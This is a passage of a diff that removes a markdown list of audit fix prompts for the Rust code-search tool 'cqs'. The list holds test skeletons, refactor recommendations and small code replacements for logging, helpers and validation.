-`InProcessFixture::seed_minimal_call_graph` doesn't exist yet — needs a small helper that inserts 3 chunks + 2 function_calls rows. Pattern lives in `tests/related_impact_test.rs` or similar; verifier should grep for an existing seeding helper before rolling a new one.
-
----
-
-### P2.79 — TC-HAP: 16 batch dispatch handlers have zero tests
-
-**Files:** `src/cli/batch/handlers/misc.rs:15,131,173,209` + `graph.rs:24,63,103,143,233,292,375,392` + `info.rs:46,100,168,302`
-
-#### Test skeleton
-
-Add `tests/batch_handlers_test.rs`:
-
-```rust
-fn seeded_ctx() -> (BatchContext, Sink) { /* InProcessFixture + tiny corpus */ }
-
-#[test] fn dispatch_callers_round_trips() {
-    let (mut ctx, mut sink) = seeded_ctx();
-    ctx.dispatch_line("callers process_data", &mut sink).unwrap();
-    let env: Value = serde_json::from_slice(&sink.bytes).unwrap();
-    assert!(env["data"]["callers"].is_array());
-}
-
-// Repeat for: dispatch_callees, dispatch_impact, dispatch_test_map,
-// dispatch_trace, dispatch_similar, dispatch_explain, dispatch_context,
-// dispatch_deps, dispatch_related, dispatch_impact_diff, dispatch_gather,
-// dispatch_scout, dispatch_task, dispatch_where, dispatch_onboard.
-```
-
-### Notes
-
-Each test is ~10 lines. Bundle as one file. Use `dispatch_search` test pattern at `src/cli/batch/handlers/search.rs:528-742` as template. Each handler test asserts only envelope shape + a non-empty results array, not algorithmic correctness.
-
----
-
-### P2.80 — TC-HAP: Reranker rerank/rerank_with_passages no tests
-
-**Files:** `src/reranker.rs:160, 190`
-
-#### Test skeleton
-
-```rust
-#[test]
-#[ignore] // requires reranker model on disk
-fn rerank_preserves_input_set_reorders_by_score() {
-    let r = Reranker::new(&Config::default()).unwrap();
-    let q = "rust async await";
-    let passages = ["tokio runtime docs", "how to bake sourdough", "rust futures trait"];
-    let scored: Vec<SearchResult> = passages.iter().enumerate().map(|(i, p)| /*...*/).collect();
-    let out = r.rerank(q, scored).unwrap();
-    assert_eq!(out.len(), 3, "all 3 passages preserved");
-    let last = out.last().unwrap();
-    assert!(last.content.contains("sourdough"), "baking ranks last");
-}
-
-#[test]
-fn rerank_with_passages_empty_input_returns_empty() {
-    let r = Reranker::new(&Config::default()).unwrap();
-    let out = r.rerank_with_passages("q", vec![], vec![]).unwrap();
-    assert!(out.is_empty());
-}
-```
-
-### Notes
-
-The empty-input test does NOT need the model — it should hit a no-op shortcut. Verify the no-op path exists at the top of `rerank_with_passages`; if not, add it. The model-loading test stays `#[ignore]`-gated.
-
----
-
-### P2.81 — TC-HAP: cmd_project Search has no CLI integration test
-
-**Files:** `src/cli/commands/infra/project.rs:70` (`cmd_project Search` arm)
-
-#### Test skeleton
-
-Add `tests/cli_project_search_test.rs`:
-
-```rust
-#[test]
-fn project_search_returns_results_from_each_registered_project() {
-    let proj_a = TempProject::with_content(&[("a/foo.rs", "fn process_data() {}")]);
-    let proj_b = TempProject::with_content(&[("b/bar.rs", "fn validate() {}")]);
-    cqs!(["project", "register", "a", proj_a.root().to_str().unwrap()]);
-    cqs!(["project", "register", "b", proj_b.root().to_str().unwrap()]);
-    cqs!(["index"], cwd = proj_a.root());
-    cqs!(["index"], cwd = proj_b.root());
-    let out = cqs!(["project", "search", "process", "--json"]);
-    let env: Value = serde_json::from_slice(&out.stdout).unwrap();
-    let results = env["data"]["results"].as_array().unwrap();
-    let projects: HashSet<&str> = results.iter().map(|r| r["project"].as_str().unwrap()).collect();
-    assert!(projects.contains("a"));
-    // (project b might or might not match depending on query; relax to "at least one").
-    assert!(!results.is_empty());
-}
-```
-
-### Notes
-
-`tests/cross_project_test.rs` likely has the cross-project fixture; reuse if present. The `cqs!` macro is whatever the project's existing CLI invocation harness uses — grep for usage in `tests/cli_*.rs`.
-
----
-
-### P2.82 — TC-HAP: cqs ref add/list/remove/update no end-to-end CLI test
-
-**Files:** `src/cli/commands/infra/reference.rs:88, 187, 320, 350`
-
-#### Test skeleton
-
-Add `tests/cli_ref_test.rs`:
-
-```rust
-#[test]
-fn ref_add_then_list_shows_reference_with_chunk_count() {
-    let proj = TempProject::with_content(&[("src/x.rs", "fn foo() {}")]);
-    let refp = TempProject::with_content(&[("ref/y.rs", "fn bar() {}"), ("ref/z.rs", "fn baz() {}")]);
-    cqs!(["init"], cwd = proj.root());
-    cqs!(["index"], cwd = proj.root());
-    cqs!(["ref", "add", "lib", refp.root().to_str().unwrap()], cwd = proj.root());
-    let out = cqs!(["ref", "list", "--json"], cwd = proj.root());
-    let env: Value = serde_json::from_slice(&out.stdout).unwrap();
-    let refs = env["data"]["refs"].as_array().unwrap();
-    assert_eq!(refs.len(), 1);
-    assert_eq!(refs[0]["name"], "lib");
-    assert!(refs[0]["chunks"].as_u64().unwrap() >= 2);
-}
-
-#[test]
-fn ref_remove_deletes_from_config_and_disk() { /* ... */ }
-#[test]
-fn ref_update_reindexes_source_content() { /* ... */ }
-#[test]
-fn ref_add_weight_rejects_out_of_range() { /* ... */ }
-```
-
-### Notes
-
-The `cqs!` invocation pattern + JSON parse is shared across `tests/cli_*.rs`. `weight` must be in `0.0..=1.0` per existing `validate_ref_name` logic.
-
----
-
-### P2.83 — TC-HAP: handle_socket_client no happy-path round-trip test
-
-**Files:** `src/cli/watch.rs:160`
-
-#### Test skeleton
-
-Add `tests/daemon_socket_roundtrip_test.rs`:
-
-```rust
-#[tokio::test(flavor = "multi_thread")]
-async fn handle_socket_client_round_trips_stats() {
-    use tokio::io::{AsyncReadExt, AsyncWriteExt};
-    use tokio::net::UnixStream;
-    let (mut client, server) = UnixStream::pair().unwrap();
-    let server_std = server.into_std().unwrap();
-    server_std.set_nonblocking(false).unwrap();
-
-    let store = InProcessFixture::seed_minimal();
-    let ctx = BatchContext::new(store);
-
-    // Spawn the server-side handler against the std stream.
-    let handle = std::thread::spawn(move || {
-        handle_socket_client(server_std, &ctx);
-    });
-
-    let request = br#"{"command":"stats","args":[]}\n"#;
-    client.write_all(request).await.unwrap();
-    let mut buf = Vec::new();
-    let _ = tokio::time::timeout(
-        std::time::Duration::from_secs(5),
-        client.read_to_end(&mut buf),
-    ).await;
-
-    let env: Value = serde_json::from_slice(&buf).unwrap();
-    assert!(env["data"]["total_chunks"].is_number());
-    assert!(env["error"].is_null());
-    handle.join().unwrap();
-}
-```
-
-### Notes
-
-`handle_socket_client` likely takes a `&Mutex<BatchContext>` per current signature — wrap appropriately. `stats` chosen because it needs no embedder. Adjust framing (newline vs length-prefix) by reading the actual `handle_socket_client` impl.
-
----
-
-### P2.84 — TC-HAP: spawn_hnsw_rebuild/drain_pending_rebuild zero tests
-
-**Files:** `src/cli/watch.rs spawn_hnsw_rebuild` (~965), `drain_pending_rebuild`
-
-#### Test skeleton
-
-Add `src/cli/watch/tests.rs` (or `tests/watch_hnsw_rebuild_test.rs`):
-
-```rust
-#[test]
-fn rebuild_completes_and_swaps_owned_index() {
-    let fx = InProcessFixture::seed_n_chunks(50, dim = 16);
-    let pending = spawn_hnsw_rebuild(
-        fx.cqs_dir.clone(),
-        fx.index_db.clone(),
-        16,
-        "test",
-    );
-    let outcome = pending.rx.recv_timeout(Duration::from_secs(30)).unwrap().unwrap();
-    let idx = outcome.expect("rebuild produced an index");
-    assert_eq!(idx.len(), 50);
-}
-
-#[test]
-fn delta_replayed_on_swap() { /* seed 50, push 5 deltas mid-rebuild, assert post-swap len == 55 */ }
-
-#[test]
-fn delta_dedup_avoids_double_insert() { /* seed 50, push delta with existing id, assert len == 50 */ }
-```
-
-### Notes
-
-dim=16 keeps the test fast; `build_hnsw_index_owned` doesn't care about embedding semantics. Verifier needs to spec out the actual `swap` API call sequence — `drain_pending_rebuild` is the consumer in the watch loop.
-
----
-
-### P2.85 — TC-HAP: for_each_command! macro + 4 emitters no behavioral tests
-
-**Files:** `src/cli/registry.rs:61`, `src/cli/definitions.rs:850,897`, `src/cli/dispatch.rs:51,83`
-
-#### Test skeleton
-
-Add `src/cli/registry.rs::tests`:
-
-```rust
-#[test]
-fn every_command_variant_has_batch_support_entry() {
-    use strum::IntoEnumIterator; // assumes Commands derives EnumIter
-    let allowed_none: HashSet<&str> = ["Help", "Version"].iter().copied().collect();
-    for v in Commands::iter() {
-        let bs = BatchSupport::for_command(&v);
-        if matches!(bs, BatchSupport::None) {
-            assert!(
-                allowed_none.contains(variant_name(&v)),
-                "Variant {:?} returns BatchSupport::None but is not on the allowed list",
-                variant_name(&v)
-            );
-        }
-    }
-}
-
-#[test]
-fn group_a_variants_disjoint_from_group_b() {
-    let a: HashSet<&str> = group_a_variant_names().into_iter().collect();
-    let b: HashSet<&str> = group_b_variant_names().into_iter().collect();
-    let inter: Vec<_> = a.intersection(&b).collect();
-    assert!(inter.is_empty(), "Variants in both groups: {:?}", inter);
-}
-```
-
-### Notes
-
-`Commands` may not derive `EnumIter` — if not, hand-roll a `for_each_command!`-driven const list helper. `group_a_variant_names()` / `group_b_variant_names()` need helper functions exposed by the registry. Verifier must wire those up.
-
-`compile_fail` test via `trybuild` was the audit's bonus — out of scope unless `trybuild` is already a dev-dep.
-
----
-
-### P2.86 — TC-HAP: build_hnsw_index_owned/build_hnsw_base_index no direct tests
-
-**Files:** `src/cli/commands/index/build.rs:848, 880`
-
-#### Test skeleton
-
-Add `src/cli/commands/index/build.rs::tests`:
-
-```rust
-#[test]
-fn build_hnsw_index_owned_returns_index_with_chunk_count() {
-    let fx = InProcessFixture::seed_n_chunks(10, dim = 16);
-    let idx = build_hnsw_index_owned(&fx.store, &fx.cqs_dir).unwrap().unwrap();
-    assert_eq!(idx.len(), 10);
-}
-
-#[test]
-fn build_hnsw_base_index_returns_none_when_no_base_rows() {
-    let fx = InProcessFixture::empty();
-    let result = build_hnsw_base_index(&fx.store, &fx.cqs_dir).unwrap();
-    assert!(result.is_none());
-}
-
-#[test]
-fn build_hnsw_index_owned_round_trips_through_disk() {
-    let fx = InProcessFixture::seed_n_chunks(10, dim = 16);
-    let idx = build_hnsw_index_owned(&fx.store, &fx.cqs_dir).unwrap().unwrap();
-    // Reload from disk:
-    let loaded = HnswIndex::load_with_dim(&fx.cqs_dir, "index", 16).unwrap();
-    assert_eq!(loaded.len(), idx.len());
-    let an_id = idx.ids().iter().next().cloned().unwrap();
-    assert!(loaded.ids().contains(&an_id));
-}
-```
-
-### Notes
-
-`HnswIndex::load_with_dim` API confirm in `src/hnsw/`. dim=16 keeps test fast.
-
----
-
-### P2.87 — TC-HAP: hyde_query_pass and doc_comment_pass have zero tests
-
-**Files:** `src/llm/hyde.rs:11`, `src/llm/doc_comments.rs:135`
-
-#### Test skeleton
-
-Extend `tests/local_provider_integration.rs`:
-
-```rust
-#[test]
-fn hyde_query_pass_round_trips_through_mock_server() {
-    let fx = InProcessFixture::seed_n_chunks(3, /* with text content */);
-    let mock = MockLlmServer::with_canned("hyde response").start();
-    std::env::set_var("CQS_LLM_PROVIDER", "local");
-    std::env::set_var("CQS_LLM_API_BASE", mock.url());
-    let count = hyde_query_pass(&fx.store, /* args */).unwrap();
-    assert_eq!(count, 3);
-    let rows = fx.store.get_summaries_by_purpose("hyde").unwrap();
-    assert_eq!(rows.len(), 3);
-}
-
-#[test]
-fn doc_comment_pass_skips_already_documented_functions() {
-    let fx = InProcessFixture::seed_with_doc_status(&[
-        ("foo", false), ("bar", false), ("baz_documented", true),
-    ]);
-    let mock = MockLlmServer::with_canned("doc response").start();
-    std::env::set_var("CQS_LLM_PROVIDER", "local");
-    std::env::set_var("CQS_LLM_API_BASE", mock.url());
-    let count = doc_comment_pass(&fx.store, /* args */).unwrap();
-    assert_eq!(count, 2);
-}
-```
-
-### Notes
-
-`MockLlmServer` should already exist for the existing `llm_summary_pass` tests in `tests/local_provider_integration.rs:113-280`. Reuse the harness.
-
----
-
-## P2.88 — Adding third score signal touches two parallel fusion paths
-
-**Finding:** P2.88 in audit-triage.md
-**Files:** `src/store/search.rs:182-229`, `src/search/query.rs:511-720`
-**Why:** RRF locked to two lists (`semantic_ids`, `fts_ids`); SPLADE fuses on a separate α-blend path. Type boost is a third post-fusion multiplier.
-
-### Notes
-
-This is an extensibility / refactor finding, not a single-line bug. Producing a "minimal change" prompt would understate the scope. Mark as a tracking issue:
-
-- Generalize `Store::rrf_fuse` to `rrf_fuse_n(ranked_lists: &[&[&str]], limit: usize) -> Vec<(String, f32)>`.
-- Introduce `trait ScoreSignal { fn rank(&self, query: &Query) -> Vec<&str>; fn weight(&self) -> f32; }` and a `FusionPipeline` that owns an ordered list of signals.
-- Migrate semantic + FTS + SPLADE + name-fingerprint + type-boost to uniform participants.
-
-Out of scope for inline fix. **Recommendation:** file as GitHub issue, mark P2.88 as "issue" disposition.
-
----
-
-## P2.89 — Vector index backend selection is hand-coded if/else
-
-**Finding:** P2.89 in audit-triage.md
-**Files:** `src/cli/store.rs:423-540`
-**Why:** 120-line `#[cfg(feature = "cuda-index")]` block; new backend = new env var, new branch, new persisted-path literal, new gate. `VectorIndex` trait clean but selector isn't trait-driven.
-
-### Notes
-
-Same shape as P2.88 — extensibility refactor, not a single-line bug. The audit recommends extending `VectorIndex` with `try_open` + `priority` so the selector iterates a `&[&dyn IndexBackend]` slice. Out of scope for inline fix. **Recommendation:** file as issue, mark P2.89 as "issue" disposition.
-
----
-
-## P2.90 — ScoringOverrides knob → 4 sites; no shared resolver
-
-**Finding:** P2.90 in audit-triage.md
-**Files:** `src/config.rs:153-172` + scoring sites
-**Why:** Each scoring knob requires editing struct, defaults, env-var resolver, consumer.
-
-### Notes
-
-Same shape — extensibility refactor. Audit recommends `HashMap<&'static str, f32>` + `static SCORING_KNOBS: &[ScoringKnob]` table. Out of scope for inline fix. **Recommendation:** file as issue, mark P2.90 as "issue" disposition.
-
----
-
-## P2.91 — NoteEntry has no kind/tag taxonomy
-
-**Finding:** P2.91 in audit-triage.md
-**Files:** `src/note.rs:41-89`
-**Why:** Sentiment-only; no kind field; "TODO" / "design-decision" / "known-bug" must be encoded in note text as unsearchable string patterns.
-
-### Notes
-
-Schema migration + struct change + TOML round-trip + CLI flag — multi-file refactor. **Recommendation:** file as issue, mark P2.91 as "issue" disposition. Inline fix would understate scope.
-
----
-# P3 + P4 fix prompts — v1.30.0 audit
-
-Inputs: `docs/audit-triage.md` + `docs/audit-findings.md`. P3 are minimal Edit-style fix prompts. P4 are paste-ready GitHub issue bodies.
-
----
-
-## P3.1 — Hoist `panic_message` helper into one place
-
-**Finding:** P3.1
-**Files:** `src/cli/pipeline/mod.rs:223-232`, `src/store/mod.rs:1322-1326`, `src/cache.rs:743-747`, `src/cache.rs:1735-1739`
-**Why:** Four copies of identical panic-payload extraction logic across 3 modules. Make it `pub(crate)` and use it everywhere.
-
-### Current code
-```rust
-// src/cli/pipeline/mod.rs:223-232 — pub(crate)? actually `fn` (private)
-fn panic_message(payload: &Box<dyn std::any::Any + Send>) -> String {
-    if let Some(s) = payload.downcast_ref::<&str>() {
-        (*s).to_string()
-    } else if let Some(s) = payload.downcast_ref::<String>() {
-        s.clone()
-    } else {
-        "unknown panic".to_string()
-    }
-}
-```
-Plus 3 inline copies inside `Drop` impls (`Store::drop`, `EmbeddingCache::drop`, `QueryCache::drop`) — each a 4-arm `match payload.downcast_ref::<&str>()` ladder.
-
-### Replacement
-1. Promote `panic_message` to `pub(crate) fn` in `src/lib.rs` (next to `temp_suffix`) keeping the same signature `&Box<dyn Any + Send> -> String`.
-2. Delete the private function in `src/cli/pipeline/mod.rs`; replace the 3 inline copies in the Drop impls with `crate::panic_message(payload)`.
-
----
-
-## P3.2 — Extract one `find_reference_config` helper for resolve.rs
-
-**Finding:** P3.2
-**Files:** `src/cli/commands/resolve.rs:26-39, 46-57`
-**Why:** `find_reference` and `resolve_reference_db` re-roll the same `iter().find(|r| r.name == name)` + verbatim error message. Single source of truth.
-
-### Current code
-```rust
-// resolve.rs:26-39  find_reference
-let cfg = config.references.iter()
-    .find(|r| r.name == name)
-    .ok_or_else(|| anyhow::anyhow!(
-        "Reference '{}' not found. Run 'cqs ref list' to see available references.", name
-    ))?;
-// ...load_references for full ReferenceIndex
-
-// resolve.rs:46-57  resolve_reference_db (inline duplicate)
-let cfg = config.references.iter()
-    .find(|r| r.name == name)
-    .ok_or_else(|| anyhow::anyhow!(
-        "Reference '{}' not found. Run 'cqs ref list' to see available references.", name
-    ))?;
-// uses cfg.path
-```
-
-### Replacement
-Add a private helper at the top of `resolve.rs`:
-```rust
-fn find_reference_config<'a>(
-    config: &'a Config,
-    name: &str,
-) -> anyhow::Result<&'a ReferenceConfig> {
-    config.references.iter()
-        .find(|r| r.name == name)
-        .ok_or_else(|| anyhow::anyhow!(
-            "Reference '{}' not found. Run 'cqs ref list' to see available references.", name
-        ))
-}
-```
-Call it from both sites.
-
----
-
-## P3.3 + P3.19 — `slot::libc_exdev` hardcode (combined)
-
-**Finding:** P3.3 (cosmetic) + P3.19 (Windows wrong constant)
-**Files:** `src/slot/mod.rs:628-647`
-**Why:** The `libc_exdev() -> 18` shim is justified by an outdated comment (libc is already a workspace dep), AND it mis-identifies the cross-device error on Windows (`ERROR_NOT_SAME_DEVICE = 17`). Drop the magic number entirely and fall back to copy+remove on any rename failure.
-
-### Current code
-```rust
-// src/slot/mod.rs:628-647
-pub(crate) fn move_file(src: &Path, dst: &Path) -> std::io::Result<()> {
-    match fs::rename(src, dst) {
-        Ok(()) => Ok(()),
-        Err(e) if e.raw_os_error() == Some(libc_exdev()) => {
-            fs::copy(src, dst)?;
-            fs::remove_file(src)?;
-            Ok(())
-        }
-        Err(e) => Err(e),
-    }
-}
-
-/// EXDEV `errno` value (cross-device link). We hardcode 18 (Linux) since
-/// `libc::EXDEV` would pull in a libc dep just for this constant. macOS also
-/// uses 18; Windows doesn't surface EXDEV the same way (rename across
-/// filesystems just succeeds via the win32 API).
-#[inline]
-fn libc_exdev() -> i32 { 18 }
-```
-
-### Replacement
-```rust
-pub(crate) fn move_file(src: &Path, dst: &Path) -> std::io::Result<()> {
-    match fs::rename(src, dst) {
-        Ok(()) => Ok(()),
-        // Fall back to copy+remove on ANY rename failure (cross-device,
-        // ERROR_NOT_SAME_DEVICE on Windows, EXDEV on Unix). Cheaper than
-        // tracking platform-specific errno constants — if the source is
-        // gone after the copy, callers see the I/O error from copy() instead.
-        Err(_) => {
-            fs::copy(src, dst)?;
-            fs::remove_file(src)?;
-            Ok(())
-        }
-    }
-}
-```
-Delete `fn libc_exdev()` entirely.
-
----
-
-## P3.4 — Doc: `enumerate_files` honors .cqsignore too
-
-**Finding:** P3.4
-**Files:** `src/lib.rs:542-547`
-**Why:** Public-API doc comment claims gitignore-only; body adds `.cqsignore` when `no_ignore=false`.
-
-### Current code
-```rust
-/// Enumerate files to index in a project directory.
-///
-/// Respects .gitignore, skips hidden files and files larger than
-/// `CQS_MAX_FILE_SIZE` bytes (default 1MB — generated code can exceed this).
-/// Returns relative paths from the project root.
-///
-/// Shared file enumeration for consistent indexing.
-pub fn enumerate_files(
-```
-
-### Replacement
-```rust
-/// Enumerate files to index in a project directory.
-///
-/// Respects `.gitignore` and `.cqsignore` (additive on top of `.gitignore`,
-/// both disabled by `no_ignore=true`); skips hidden files and files larger
-/// than `CQS_MAX_FILE_SIZE` bytes (default 1 MiB — generated code can
-/// exceed this). Returns relative paths from the project root.
-pub fn enumerate_files(
-```
-
----
-
-## P3.5 — Drop dead `generate_nl_with_call_context` from public API
-
-**Finding:** P3.5
-**Files:** `src/lib.rs:165` (`pub use nl::*`); `src/nl/mod.rs:43-59`
-**Why:** Five-arg wrapper that hardcodes `summary=None, hyde=None`. Zero production callers, only test references; leaks via glob re-export.
-
-### Current code
-```rust
-// src/nl/mod.rs:43-59
-pub fn generate_nl_with_call_context(
-    chunk: &Chunk, callers: &[String], callees: &[String],
-    note: Option<&str>, template: NlTemplate,
-) -> String {
-    generate_nl_with_call_context_and_summary(
-        chunk, callers, callees, note, /*summary=*/ None,
-        /*hyde=*/ None, template,
-    )
-}
-```
-
-### Replacement
-Delete the wrapper. Update tests in `src/nl/mod.rs` that call it to call `generate_nl_with_call_context_and_summary(.., None, None, ..)` directly. Optionally tighten the glob: replace `pub use nl::*` in `src/lib.rs:165` with an explicit `pub use nl::{NlTemplate, generate_nl_description, generate_nl_with_template, generate_nl_with_call_context_and_summary};`.
-
----
-
-## P3.6 — Rename `GatherArgs::expand` to `--depth`
-
-**Finding:** P3.6
-**Files:** `src/cli/args.rs:GatherArgs::expand`
-**Why:** Top-level `--expand-parent` (bool) and `cqs gather --expand <N>` (usize) collide; v1.30.0 only half-fixed the rename. Align `gather` with `onboard`/`impact`/`test-map` which already use `--depth`.
-
-### Current code
-```rust
-// in GatherArgs (src/cli/args.rs)
-#[arg(long, default_value = "2")]
-pub expand: usize,
-```
-
-### Replacement
-```rust
-/// Call-graph BFS depth for gather expansion (matches onboard/impact/test-map).
-#[arg(long, default_value = "2", visible_alias = "expand")]
-pub depth: usize,
-```
-Sweep references to `args.expand` in `src/cli/commands/search/gather.rs` to `args.depth`.
-
----
-
-## P3.7 — `cqs eval --save` requires `.json`
-
-**Finding:** P3.7
-**Files:** `src/cli/commands/eval/mod.rs` (`EvalCmdArgs::save`); call site that opens the file
-**Why:** Accepts any path; eval reports are JSON-only. Asymmetric with `--baseline` which already requires the file exist.
-
-### Current code
-```rust
-// EvalCmdArgs::save: Option<PathBuf>  — no validation
-// In the runner: File::create(&save_path)?
-```
-
-### Replacement
-At the runner's open site (or top of `cmd_eval`):
-```rust
-let save_path = args.save.as_deref().map(|p| {
-    let ext = p.extension().and_then(|e| e.to_str());
-    match ext {
-        Some("json") => Ok(p.to_path_buf()),
-        Some(other) => anyhow::bail!(
-            "--save must end in .json (got .{other}); eval reports are JSON-only"
-        ),
-        None => {
-            let with_ext = p.with_extension("json");
-            tracing::info!(path = %with_ext.display(), "appending .json to --save path");
-            Ok(with_ext)
-        }
-    }
-}).transpose()?;
-```
-
----
-
-## P3.8 — Eval runner: `eprintln!` → `tracing::info!`
-
-**Finding:** P3.8
-**Files:** `src/cli/commands/eval/runner.rs:163-168`
-**Why:** Every other progress signal uses `tracing::info!`; `eprintln!` defeats `RUST_LOG` filtering and JSON log redirect.
-
-### Current code
-```rust
-// runner.rs:167 (approx)
-eprintln!("[eval] {done}/{total} queries ({qps:.1} q/s)");
-```
-
-### Replacement
-```rust
-tracing::info!(done, total = total_queries, qps, "eval progress");
-```
-
----
-
-## P3.9 — Add a span to `nl::generate_nl_with_template`
-
-**Finding:** P3.9
-**Files:** `src/nl/mod.rs:209` (and transitively covers `:43, :65, :189`)
-**Why:** All four NL generators flow into `generate_nl_with_template`; a single `debug_span!` at that root site covers them all.
-
-### Current code
-```rust
-pub fn generate_nl_with_template(
-    chunk: &Chunk, callers: &[String], callees: &[String],
-    note: Option<&str>, summary: Option<&str>, hyde: Option<&str>,
-    template: NlTemplate,
-) -> String {
-    // ...
-}
-```
-
-### Replacement
-Insert at line 1 of the body:
-```rust
-let _span = tracing::debug_span!(
-    "generate_nl",
-    template = ?template,
-    chunk_kind = ?chunk.chunk_type,
-    len = chunk.content.len(),
-).entered();
-```
-
----
-
-## P3.10 — `embed_documents`/`embed_query` completion events
-
-**Finding:** P3.10
-**Files:** `src/embedder/mod.rs:683` (`embed_documents`), `:722` (`embed_query`)
-**Why:** Entry spans only carry input fields; no completion event with output dim/count/time.
-
-### Current code
-```rust
-// inside embed_documents, after the loop returns embeddings:
-Ok(embeddings)
-
-// inside embed_query, before returning:
-Ok(embedding)
-```
-
-### Replacement
-At the bottom of `embed_documents` (just before `Ok(embeddings)`):
-```rust
-tracing::info!(
-    total = embeddings.len(),
-    dim = self.embedding_dim(),
-    input_count = texts.len(),
-    "embed_documents complete"
-);
-```
-At the bottom of `embed_query` (just before `Ok(embedding)`):
-```rust
-tracing::debug!(
-    dim = self.embedding_dim(),
-    "embed_query complete"
-);
-```
-
----
-
-## P3.11 — Reranker `rerank_with_passages` length-mismatch warn + error
-
-**Finding:** P3.11
-**Files:** `src/reranker.rs:200-220`
-**Why:** When passages.len() != results.len(), the function silently scores arbitrary pairs and corrupts ranks. Hard error + structured warn.
-
-### Current code
-```rust
-pub fn rerank_with_passages(
-    &self, query: &str, passages: &[&str], results: &mut Vec<SearchResult>,
-) -> Result<(), RerankerError> {
-    let _span = tracing::info_span!("rerank_with_passages",
-        n = passages.len()).entered();
-    if results.is_empty() { return Ok(()); }
-    // ... compute_scores etc.
-}
-```
-
-### Replacement
-After the entry span / early-return:
-```rust
-if passages.len() != results.len() {
-    tracing::warn!(
-        passages = passages.len(),
-        results = results.len(),
-        "rerank_with_passages: length mismatch — caller bug, refusing to score",
-    );
-    return Err(RerankerError::InvalidArguments(format!(
-        "passages.len()={} != results.len()={}",
-        passages.len(), results.len()
-    )));
-}
-```
-Add the `InvalidArguments(String)` variant to `RerankerError` if not present.
-
----
-
-## P3.12 — `train_data` git wrappers log non-zero exits
-
-**Finding:** P3.12
-**Files:** `src/train_data/git.rs:65-242` (`git_log` ~65, `git_diff_tree` ~131, `git_show` ~173)
-**Why:** Each wrapper bundles exit + stderr into an `Err` and returns silently. Operators with shallow clones hit "50% calls fail" with no journal trail.
-
-### Current code (pattern repeated 3x)
-```rust
-if !output.status.success() {
-    return Err(TrainDataError::Git(format!(
-        "git diff-tree failed: {}",
-        String::from_utf8_lossy(&output.stderr).trim()
-    )));
-}
-```
-
-### Replacement
-At each site, before the early-return:
-```rust
-if !output.status.success() {
-    let stderr = String::from_utf8_lossy(&output.stderr);
-    tracing::warn!(
-        exit = output.status.code(),
-        stderr = %stderr.trim(),
-        "git_diff_tree failed",  // change message per fn: git_log / git_show
-    );
-    return Err(TrainDataError::Git(format!(
-        "git diff-tree failed: {}", stderr.trim()
-    )));
-}
-```
-Apply consistently to `git_log` (~line 65), `git_diff_tree` (~131), `git_show` (~173). Keep the per-fn message identifier so operators can grep.
-
----
-
-## P3.13 — Convert format-string `tracing::info!` to structured fields (9 sites)
-
-**Finding:** P3.13
-**Files:** `src/hnsw/build.rs:78,236`, `src/hnsw/persist.rs:210,638,771`, `src/reference.rs:220`, `src/cli/commands/train/export_model.rs:76`, `src/audit.rs:85,93`, `src/embedder/provider.rs:149`
-**Why:** Format-string interpolation produces unparseable rendered messages once OB-V1.30-1 lands JSON formatting. Pure-mechanical change to structured fields.
-
-### Current code → Replacement (one-pass sweep)
-```rust
-// src/hnsw/build.rs:78
-- tracing::info!("Building HNSW index with {} vectors", nb_elem);
-+ tracing::info!(count = nb_elem, "Building HNSW index");
-
-// src/hnsw/build.rs:236
-- tracing::info!("HNSW index built: {} vectors", id_map.len());
-+ tracing::info!(count = id_map.len(), "HNSW index built");
-
-// src/hnsw/persist.rs:210
-- tracing::info!("Saving HNSW index to {}/{}", dir.display(), basename);
-+ tracing::info!(dir = %dir.display(), basename, "Saving HNSW index");
-
-// src/hnsw/persist.rs:638
-- tracing::info!("Loading HNSW index from {}/{}", dir.display(), basename);
-+ tracing::info!(dir = %dir.display(), basename, "Loading HNSW index");
-
-// src/hnsw/persist.rs:771
-- tracing::info!("HNSW index loaded: {} vectors", id_map.len());
-+ tracing::info!(count = id_map.len(), "HNSW index loaded");
-
-// src/reference.rs:220
-- tracing::info!("Loaded {} reference indexes", refs.len());
-+ tracing::info!(count = refs.len(), "Loaded reference indexes");
-
-// src/cli/commands/train/export_model.rs:76
-- tracing::info!("Model exported to {}", output.display());
-+ tracing::info!(output = %output.display(), "Model exported");
-
-// src/audit.rs:85
-- tracing::debug!("Failed to parse audit-mode.json: {}", e);
-+ tracing::debug!(error = %e, "Failed to parse audit-mode.json");
-
-// src/audit.rs:93
-- .map_err(|e| tracing::debug!("Failed to parse expires_at: {}", e))
-+ .map_err(|e| tracing::debug!(error = %e, "Failed to parse expires_at"))
-
-// src/embedder/provider.rs:149
-- tracing::debug!("Failed to symlink {}: {}", lib, e);
-+ tracing::debug!(lib = %lib, error = %e, "Failed to symlink");
-```
-Verify post-fix with `rg 'tracing::(info|warn|debug|error)!\("[^"]*\{' src/` — should return zero hits in these files.
-
----
-
-## P3.14 — `build_cluster` warn when corpus has chunks but no UMAP coords
-
-**Finding:** P3.14
-**Files:** `src/serve/data.rs:901, 1020` (in `build_cluster`)
-**Why:** Empty cluster view leaves operators staring at a blank pane with no journal hint that `cqs index --umap` is needed.
-
-### Current code (sketch — at the end of `build_cluster`)
-```rust
-Ok(ClusterResponse { nodes, skipped, total_chunks })
-```
-
-### Replacement
-Right before the return:
-```rust
-if nodes.is_empty() && skipped > 0 {
-    tracing::warn!(
-        skipped,
-        total_chunks,
-        "build_cluster: corpus has chunks but no UMAP coordinates — run `cqs index --umap`",
-    );
-}
-Ok(ClusterResponse { nodes, skipped, total_chunks })
-```
-
----
-
-## P3.15 — Reject leading/trailing-dash slot names
-
-**Finding:** P3.15
-**Files:** `src/slot/mod.rs:159-178` (`validate_slot_name`); test block `:661+`
-**Why:** `-foo` collides with clap's flag parser; trailing dashes get stripped by various copy-paste pipelines.
-
-### Current code
-```rust
-pub fn validate_slot_name(name: &str) -> Result<(), SlotError> {
-    if name.is_empty() || name.len() > 32 { /* ... */ }
-    if !name.chars().all(|c| c.is_ascii_lowercase()
-        || c.is_ascii_digit() || c == '_' || c == '-') { /* ... */ }
+    env.insert("_meta".to_string(), serde_json::to_value(EnvelopeMeta::new())?);
+    let buf = serde_json::Value::Object(env);
+    let s = format_envelope_to_string(&buf)?;
+    println!("{s}");
     Ok(())
 }
 ```
 
-### Replacement
-After the existing checks, add:
+**Step 3.** Update the timeout arm in `status.rs`:
+
 ```rust
-if name.starts_with('-') || name.ends_with('-') {
-    return Err(SlotError::InvalidName(format!(
-        "slot name '{name}' cannot start or end with '-' \
-         (clap parses leading dash as a flag)"
-    )));
-}
+            cqs::daemon_translate::FreshnessWait::Timeout(snap) => {
